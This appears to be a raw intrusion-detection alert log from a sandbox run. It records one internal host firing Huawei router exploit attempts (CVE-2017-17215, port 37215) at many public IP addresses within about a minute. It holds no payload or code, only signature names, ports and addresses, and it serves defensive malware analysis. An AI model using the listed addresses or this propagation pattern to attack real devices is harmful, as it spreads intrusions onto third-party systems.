                                                    07/10/24-08:27:05.206517TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4573837215192.168.2.1485.57.254.58
                                                    07/10/24-08:27:22.791889TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3282437215192.168.2.1498.50.79.81
                                                    07/10/24-08:26:36.392999TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3767037215192.168.2.14197.37.217.100
                                                    07/10/24-08:27:22.748001TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5026637215192.168.2.14197.59.54.4
                                                    07/10/24-08:26:20.183913TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5972637215192.168.2.14197.97.197.227
                                                    07/10/24-08:27:28.162130TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5349837215192.168.2.1475.106.70.4
                                                    07/10/24-08:26:26.602749TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5818037215192.168.2.14197.236.11.10
                                                    07/10/24-08:27:32.614606TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5615637215192.168.2.1441.118.46.173
                                                    07/10/24-08:27:30.533140TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3363037215192.168.2.14157.70.79.230
                                                    07/10/24-08:26:31.078993TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4173037215192.168.2.14175.221.112.34
                                                    07/10/24-08:26:43.611873TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3484237215192.168.2.1441.63.35.157
                                                    07/10/24-08:26:45.651958TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5895437215192.168.2.1444.208.154.193
                                                    07/10/24-08:26:25.478512TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4915637215192.168.2.14197.92.96.197
                                                    07/10/24-08:26:29.746967TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5683237215192.168.2.14197.125.213.29
                                                    07/10/24-08:26:41.513250TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5158237215192.168.2.14157.23.70.75
                                                    07/10/24-08:27:27.080218TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5134037215192.168.2.14157.0.36.225
                                                    07/10/24-08:26:20.168870TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3462037215192.168.2.14157.100.113.152
                                                    07/10/24-08:27:02.906092TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4702637215192.168.2.1441.126.170.120
                                                    07/10/24-08:26:34.249652TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3771237215192.168.2.14116.250.204.30
                                                    07/10/24-08:26:31.102674TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5457637215192.168.2.1441.124.171.113
                                                    07/10/24-08:26:14.822403TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3349037215192.168.2.1475.28.53.202
                                                    07/10/24-08:27:08.403576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5099237215192.168.2.14157.29.244.108
                                                    07/10/24-08:26:43.881228TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4280437215192.168.2.14157.142.96.123
                                                    07/10/24-08:26:36.392323TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5451037215192.168.2.1441.9.162.186
                                                    07/10/24-08:26:28.840870TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3321437215192.168.2.14197.121.155.236
                                                    07/10/24-08:26:43.879601TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4798237215192.168.2.1441.211.78.199
                                                    07/10/24-08:26:29.797142TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4407237215192.168.2.1432.170.42.178
                                                    07/10/24-08:26:59.529956TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3937237215192.168.2.14126.121.253.114
                                                    07/10/24-08:26:28.832747TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5075837215192.168.2.14197.25.237.90
                                                    07/10/24-08:26:15.882242TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4640637215192.168.2.14197.98.73.175
                                                    07/10/24-08:26:43.915899TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4301637215192.168.2.1461.33.208.236
                                                    07/10/24-08:26:59.783807TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4720037215192.168.2.14213.140.42.173
                                                    07/10/24-08:27:05.213994TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4580037215192.168.2.14157.101.65.59
                                                    07/10/24-08:26:23.341408TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5564237215192.168.2.1445.112.206.101
                                                    07/10/24-08:26:51.973962TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4420637215192.168.2.1441.224.122.55
                                                    07/10/24-08:27:22.891775TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4200437215192.168.2.14157.235.10.59
                                                    07/10/24-08:27:31.474983TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3485237215192.168.2.14157.167.5.178
                                                    07/10/24-08:26:14.622607TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4764037215192.168.2.1441.180.237.246
                                                    07/10/24-08:26:14.735406TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6089437215192.168.2.14157.50.120.184
                                                    07/10/24-08:27:19.239107TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5590037215192.168.2.14145.240.69.57
                                                    07/10/24-08:27:10.699578TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4480837215192.168.2.14197.76.159.183
                                                    07/10/24-08:26:20.132351TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5955037215192.168.2.1441.154.199.110
                                                    07/10/24-08:26:29.813463TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4361437215192.168.2.14157.178.33.185
                                                    07/10/24-08:26:41.408660TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4213637215192.168.2.14197.217.159.0
                                                    07/10/24-08:26:45.583346TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5629837215192.168.2.14197.64.136.16
                                                    07/10/24-08:27:32.484037TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4280437215192.168.2.14197.157.111.239
                                                    07/10/24-08:27:02.904364TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5412637215192.168.2.14166.24.55.248
                                                    07/10/24-08:27:13.815715TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4373837215192.168.2.14157.1.231.177
                                                    07/10/24-08:26:22.295536TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5084637215192.168.2.14197.243.254.13
                                                    07/10/24-08:26:51.924375TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5435637215192.168.2.14197.108.108.255
                                                    07/10/24-08:26:33.245667TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3501037215192.168.2.14157.186.96.128
                                                    07/10/24-08:26:14.808084TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3478237215192.168.2.14157.252.120.183
                                                    07/10/24-08:26:45.610191TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5689037215192.168.2.14193.114.196.194
                                                    07/10/24-08:26:14.815907TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4278837215192.168.2.1441.159.153.229
                                                    07/10/24-08:26:55.405669TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3873237215192.168.2.1431.191.202.15
                                                    07/10/24-08:26:43.756816TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6089837215192.168.2.1462.1.97.110
                                                    07/10/24-08:26:20.100674TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5480237215192.168.2.14157.215.31.167
                                                    07/10/24-08:26:48.007312TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6002637215192.168.2.14157.25.107.251
                                                    07/10/24-08:26:23.357682TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5112637215192.168.2.14152.189.222.20
                                                    07/10/24-08:27:19.278203TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4366837215192.168.2.14157.82.225.223
                                                    07/10/24-08:26:31.051778TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4452237215192.168.2.1481.220.66.6
                                                    07/10/24-08:27:33.956597TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4149237215192.168.2.1461.168.234.220
                                                    07/10/24-08:26:45.612875TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3684037215192.168.2.14157.12.157.218
                                                    07/10/24-08:26:55.273109TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5771037215192.168.2.14157.103.128.32
                                                    07/10/24-08:27:13.815715TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6003637215192.168.2.14157.245.203.199
                                                    07/10/24-08:26:55.380846TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4747837215192.168.2.1441.69.55.231
                                                    07/10/24-08:27:32.517419TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5155037215192.168.2.1441.92.63.203
                                                    07/10/24-08:26:52.022558TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3516637215192.168.2.14209.151.11.90
                                                    07/10/24-08:26:20.152371TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3430037215192.168.2.1441.77.117.86
                                                    07/10/24-08:27:02.982292TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5784037215192.168.2.1478.253.37.146
                                                    07/10/24-08:26:43.805226TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4153637215192.168.2.14197.125.99.81
                                                    07/10/24-08:27:08.325316TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5593837215192.168.2.14197.243.205.160
                                                    07/10/24-08:26:43.915095TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6007237215192.168.2.14219.162.152.112
                                                    07/10/24-08:27:30.408951TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4747237215192.168.2.1469.163.153.218
                                                    07/10/24-08:26:25.494169TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3795837215192.168.2.14157.25.209.174
                                                    07/10/24-08:26:47.746309TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5367037215192.168.2.1441.205.148.20
                                                    07/10/24-08:26:38.575243TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5934437215192.168.2.14197.7.139.66
                                                    07/10/24-08:27:23.965193TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4264837215192.168.2.14173.232.35.1
                                                    07/10/24-08:26:31.076380TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5448637215192.168.2.14157.62.149.224
                                                    07/10/24-08:27:30.514704TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4148837215192.168.2.1418.68.158.79
                                                    07/10/24-08:27:14.890246TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4184837215192.168.2.14157.9.128.155
                                                    07/10/24-08:26:26.589872TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5129237215192.168.2.14197.40.197.101
                                                    07/10/24-08:26:28.781471TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4738437215192.168.2.14197.168.102.126
                                                    07/10/24-08:27:13.837661TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3574037215192.168.2.14138.162.52.229
                                                    07/10/24-08:26:53.187114TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3476637215192.168.2.1441.90.160.102
                                                    07/10/24-08:26:28.804667TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5944837215192.168.2.14197.175.103.190
                                                    07/10/24-08:26:51.961222TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4485037215192.168.2.14157.61.218.170
                                                    07/10/24-08:26:15.793642TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3500237215192.168.2.14157.123.233.245
                                                    07/10/24-08:27:23.969981TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3322837215192.168.2.14155.55.220.68
                                                    07/10/24-08:26:59.585766TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5429837215192.168.2.14117.60.26.228
                                                    07/10/24-08:26:14.755062TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4885237215192.168.2.1441.187.86.244
                                                    07/10/24-08:26:36.330263TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3944837215192.168.2.14197.36.13.31
                                                    07/10/24-08:26:51.975524TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5419437215192.168.2.14197.40.177.11
                                                    07/10/24-08:27:23.881765TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4534237215192.168.2.14146.252.135.138
                                                    07/10/24-08:26:25.523896TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5132437215192.168.2.14157.76.14.36
                                                    07/10/24-08:27:05.230941TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4825037215192.168.2.14157.67.11.95
                                                    07/10/24-08:26:41.528499TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4695237215192.168.2.14157.242.136.198
                                                    07/10/24-08:26:28.784131TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4813837215192.168.2.1441.93.189.37
                                                    07/10/24-08:26:49.897111TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5588237215192.168.2.14142.101.216.252
                                                    07/10/24-08:26:36.431217TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4958637215192.168.2.14157.44.209.94
                                                    07/10/24-08:26:41.430323TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5001237215192.168.2.14197.226.177.99
                                                    07/10/24-08:26:25.513767TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4656837215192.168.2.14157.150.247.88
                                                    07/10/24-08:27:20.507849TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5269237215192.168.2.14197.176.160.7
                                                    07/10/24-08:27:10.612080TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5226237215192.168.2.1441.167.153.123
                                                    07/10/24-08:27:05.133691TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3458237215192.168.2.14197.123.216.177
                                                    07/10/24-08:27:10.558738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5191437215192.168.2.14197.97.131.170
                                                    07/10/24-08:26:20.102730TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4268837215192.168.2.1463.22.217.121
                                                    07/10/24-08:26:42.410234TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5606637215192.168.2.14173.52.56.140
                                                    07/10/24-08:26:59.639187TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4461237215192.168.2.1441.174.48.145
                                                    07/10/24-08:27:27.169986TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3310637215192.168.2.1441.110.173.140
                                                    07/10/24-08:27:28.035789TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5237437215192.168.2.14197.145.20.62
                                                    07/10/24-08:27:33.773632TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4432637215192.168.2.14157.247.202.9
                                                    07/10/24-08:26:18.036814TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3665837215192.168.2.1441.196.148.186
                                                    07/10/24-08:26:38.559180TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3987837215192.168.2.14157.202.68.147
                                                    07/10/24-08:27:05.173254TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5560237215192.168.2.14197.182.74.74
                                                    07/10/24-08:27:31.463838TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5232637215192.168.2.14132.194.68.167
                                                    07/10/24-08:26:13.819532TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3383437215192.168.2.1441.68.218.83
                                                    07/10/24-08:26:57.667245TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5201637215192.168.2.1441.19.216.73
                                                    07/10/24-08:26:59.828074TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5735437215192.168.2.1441.132.60.41
                                                    07/10/24-08:27:11.525645TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3337237215192.168.2.1447.168.217.132
                                                    07/10/24-08:27:07.389913TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3585237215192.168.2.1441.245.11.50
                                                    07/10/24-08:26:20.156506TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5764637215192.168.2.1441.108.226.195
                                                    07/10/24-08:26:22.275935TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4517037215192.168.2.1441.50.235.194
                                                    07/10/24-08:26:38.577116TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5095637215192.168.2.1478.227.170.95
                                                    07/10/24-08:26:31.075999TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5974637215192.168.2.14197.143.104.80
                                                    07/10/24-08:27:13.822075TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5375637215192.168.2.14197.91.97.94
                                                    07/10/24-08:27:28.054333TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4051037215192.168.2.14197.125.66.107
                                                    07/10/24-08:27:30.406012TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3375437215192.168.2.14157.177.98.176
                                                    07/10/24-08:27:23.965651TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5221437215192.168.2.1441.151.20.24
                                                    07/10/24-08:27:33.681754TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4982437215192.168.2.14157.99.176.90
                                                    07/10/24-08:27:21.455167TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5070437215192.168.2.1441.133.162.158
                                                    07/10/24-08:26:51.987435TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5313437215192.168.2.1441.244.23.12
                                                    07/10/24-08:27:19.198871TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5496237215192.168.2.14205.1.34.61
                                                    07/10/24-08:27:20.509281TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3908037215192.168.2.14197.71.137.125
                                                    07/10/24-08:27:05.227018TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4189037215192.168.2.14197.197.240.93
                                                    07/10/24-08:26:28.853108TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4930437215192.168.2.14197.253.64.84
                                                    07/10/24-08:26:25.499422TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4881237215192.168.2.1482.23.203.249
                                                    07/10/24-08:27:28.128256TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3618437215192.168.2.1482.7.199.237
                                                    07/10/24-08:26:22.219271TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4361837215192.168.2.1423.66.236.57
                                                    07/10/24-08:27:05.217430TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5684837215192.168.2.1451.152.171.146
                                                    07/10/24-08:26:45.583346TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3312837215192.168.2.14197.57.148.150
                                                    07/10/24-08:26:29.873958TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5033437215192.168.2.1441.225.96.165
                                                    07/10/24-08:27:17.096498TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4175237215192.168.2.14145.158.190.77
                                                    07/10/24-08:27:17.043908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3951637215192.168.2.1441.104.26.75
                                                    07/10/24-08:26:26.584785TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6030037215192.168.2.14197.4.129.6
                                                    07/10/24-08:27:19.287568TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5081037215192.168.2.14163.130.38.100
                                                    07/10/24-08:27:19.352800TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3589837215192.168.2.14197.220.65.41
                                                    07/10/24-08:26:41.402379TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4135637215192.168.2.14197.237.165.233
                                                    07/10/24-08:26:18.024186TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4153637215192.168.2.1476.23.65.164
                                                    07/10/24-08:26:59.707998TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4946837215192.168.2.1441.39.153.80
                                                    07/10/24-08:27:31.478959TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4878637215192.168.2.14197.209.216.250
                                                    07/10/24-08:26:13.747131TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5171237215192.168.2.1441.186.79.210
                                                    07/10/24-08:26:34.188754TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4068437215192.168.2.1441.126.175.94
                                                    07/10/24-08:26:45.663934TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5933037215192.168.2.14157.7.180.194
                                                    07/10/24-08:26:29.863602TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5631637215192.168.2.14157.240.168.133
                                                    07/10/24-08:26:41.568062TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3496637215192.168.2.14216.79.91.242
                                                    07/10/24-08:26:23.268554TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4492837215192.168.2.1441.160.223.46
                                                    07/10/24-08:27:24.906290TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4100437215192.168.2.1441.26.45.215
                                                    07/10/24-08:26:38.657439TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5650037215192.168.2.14197.193.244.243
                                                    07/10/24-08:26:55.458086TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5041637215192.168.2.1441.225.45.27
                                                    07/10/24-08:26:22.281156TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3696037215192.168.2.1441.251.90.2
                                                    07/10/24-08:27:11.518596TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4200237215192.168.2.14157.166.54.37
                                                    07/10/24-08:26:15.809850TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5086637215192.168.2.14157.249.91.54
                                                    07/10/24-08:26:42.392755TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3932637215192.168.2.14157.156.95.209
                                                    07/10/24-08:27:30.535069TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3323637215192.168.2.14157.131.71.32
                                                    07/10/24-08:26:33.248945TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3931437215192.168.2.1487.32.234.33
                                                    07/10/24-08:27:11.489272TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4767037215192.168.2.14157.203.146.6
                                                    07/10/24-08:26:45.598670TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4690837215192.168.2.14157.220.186.159
                                                    07/10/24-08:26:23.299402TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4713837215192.168.2.14197.154.225.29
                                                    07/10/24-08:26:42.180724TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4237437215192.168.2.1441.112.184.48
                                                    07/10/24-08:27:07.316362TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5678037215192.168.2.14197.190.107.55
                                                    07/10/24-08:27:33.934356TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4158237215192.168.2.1441.158.2.148
                                                    07/10/24-08:26:36.406451TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4636037215192.168.2.14210.65.96.164
                                                    07/10/24-08:26:53.147392TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4439437215192.168.2.1441.240.250.231
                                                    07/10/24-08:27:05.234090TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5217837215192.168.2.14197.183.218.237
                                                    07/10/24-08:26:33.175364TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6044437215192.168.2.14157.82.100.117
                                                    07/10/24-08:26:28.855166TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4066037215192.168.2.14157.203.34.171
                                                    07/10/24-08:26:15.826179TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3725837215192.168.2.14157.194.210.126
                                                    07/10/24-08:26:57.654674TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3761237215192.168.2.14113.157.86.99
                                                    07/10/24-08:26:29.835247TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5517637215192.168.2.14157.56.106.203
                                                    07/10/24-08:26:25.443386TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4187037215192.168.2.1441.204.178.112
                                                    07/10/24-08:26:17.962060TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4807837215192.168.2.14197.138.146.252
                                                    07/10/24-08:26:11.120282TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4085637215192.168.2.1446.221.220.195
                                                    07/10/24-08:26:15.867804TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5203637215192.168.2.1441.161.75.221
                                                    07/10/24-08:26:42.370948TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4936237215192.168.2.1441.15.169.17
                                                    07/10/24-08:27:13.993743TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5390237215192.168.2.1441.246.149.186
